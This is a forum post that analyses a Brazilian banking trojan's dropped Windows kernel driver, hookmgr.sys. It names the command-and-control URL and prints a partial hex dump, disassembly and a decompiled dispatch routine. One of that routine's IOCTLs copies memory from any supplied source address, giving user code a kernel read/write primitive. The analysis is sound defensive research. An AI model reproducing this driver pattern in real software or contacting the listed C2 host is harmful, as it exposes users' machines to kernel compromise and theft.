A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27791  by unixfreaxjp
 Sun Jan 31, 2016 7:47 am
Hello @EP_X0FF

Someone sent me a binary to be investigated as a banking trojan, 37 MB in size. The point is that it installs a small Windows driver and I don't know what its purpose is, except grabbing process IDs (and its installation).
https://www.virustotal.com/en/file/57a2 ... 454211673/
https://www.virustotal.com/en/file/887b ... 454219912/
The CnC is known (by behavior):
contador.blackmagictwo.com/visualizar/fix.php (Brazil)
It has big embedded data:
[screenshot]
The PE is VB.NET; the data is extracted on the fly, which is done in this function:
[screenshot]
One extracted component is a small PE, a driver that is saved as hookmgr.sys.
VT: https://www.virustotal.com/en/file/e547 ... 454217852/
The dump of the driver shows some obvious parts:
00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
---------------------------------------------------------------------------------------------
00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
---------------------------------------------------------------------------------------------
00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
---------------------------------------------------------------------------------------------
00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.16385.1\inc\ddk\wdm.h
00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
//////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
//////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
---------------------------------------------------------------------------------------------
00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
---------------------------------------------------------------------------------------------
00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Device\hookmgr
00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
---------------------------------------------------------------------------------------------
00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
---------------------------------------------------------------------------------------------
00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
But the other part must be reversed, like this installation function:
// The installation is reversed from the entry point: 0x1403e (in INIT, sets the /GS cookie) -> the real DriverEntry at 0x11310
// it creates the hook manager device for the driver
|       |   0x0001403e      8bff           mov edi, edi
|       |   0x00014040      55             push ebp
|       |   0x00014041      8bec           mov ebp, esp
|       |   0x00014043      e8bdffffff     call 0x14005
|       |   0x00014048      5d             pop ebp
\       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
                  ↓ ↓ ↓ ↓ ↓
|           0x00011310      8bff           mov edi, edi
|           0x00011312      55             push ebp
|           0x00011313      8bec           mov ebp, esp
|           0x00011315      83ec0c         sub esp, 0xc
|           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
|           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
|           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
|           0x00011329      50             push eax        ;  source
|           0x0001132a      6828300100     push 0x13028    ;  dest
|           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
|           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
|           0x00011338      51             push ecx       ; src
|           0x00011339      6830300100     push 0x13030   ; dest
|           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
|           0x00011344      6818300100     push 0x13018  ; &DeviceObject (out)
|           0x00011349      6a00           push 0        ; Exclusive
|           0x0001134b      6a00           push 0        ; DeviceCharacteristics
|           0x0001134d      6a15           push 0x15     ; DeviceType
|           0x0001134f      6828300100     push 0x13028  ; DeviceName "\Device\hookmgr"
|           0x00011354      6a00           push 0        ; DeviceExtensionSize
|           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
|           0x00011359      52             push edx      ; DriverObject
|           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
|           0x00011360      8945fc         mov dword [ebp-local_1], eax
|           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
|       ,=< 0x00011367      7c4a           jl 0x113b3
So far so good.
[screenshot]

But then I faced this weird switch-case, and I don't know what its point is:
///////////////////////////////////
Driver switches for actions
//////////////////////////////////
// Dispatch routine at VA 0x11070 (file offset 0x470 in the dump above), cleaned up from the
// decompiler output. The offsets in the comments are the x86 IRP / IO_STACK_LOCATION fields
// the code reads. sub_112B0 is the checked-build inline of IoGetCurrentIrpStackLocation:
// the RtlAssert on Irp->CurrentLocation from the memo above, then
// return Irp->Tail.Overlay.CurrentStackLocation (Irp+0x60).
NTSTATUS __stdcall DispatchControl(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
  NTSTATUS           status;
  PIO_STACK_LOCATION stack = sub_112B0(Irp);
  ULONG              inLen = stack->Parameters.DeviceIoControl.InputBufferLength; // stack+0x08
  PULONG             buf   = (PULONG)Irp->AssociatedIrp.SystemBuffer;             // Irp+0x0C (METHOD_BUFFERED)

  Irp->IoStatus.Information = 0;                                                   // Irp+0x1C

  if ( stack->MajorFunction == IRP_MJ_DEVICE_CONTROL )                             // stack+0x00 == 0x0E
  {
    switch ( stack->Parameters.DeviceIoControl.IoControlCode )                     // stack+0x0C
    {
/////////////////////////
      case 0x224004:   // copy memory: buf[0] = destination, buf[1] = source, buf[2] = length
////////////////////////
        if ( inLen < 0xC )
        {
          status = STATUS_BUFFER_TOO_SMALL;                                        // 0xC0000023
        }
        else
        {
          __try                                    // the {-2} = 0 / {-2} = -2 markers in the raw decompile
          {
            ProbeForWrite((PVOID)buf[0], buf[2], 1);        // only the destination is probed
            memcpy((PVOID)buf[0], (PVOID)buf[1], buf[2]);
            status = STATUS_SUCCESS;
          }
          __except ( EXCEPTION_EXECUTE_HANDLER )
          {
            status = GetExceptionCode();           // the filter at 0x590 saves ExceptionRecord->ExceptionCode
          }
        }
        break;

////////////////////////
      case 0x22400C:   // hand the address of PsGetCurrentThreadId to user mode
////////////////////////
        if ( !dword_1301C )
          dword_1301C = sub_11010();               // MmGetSystemRoutineAddress(L"PsGetCurrentThreadId")
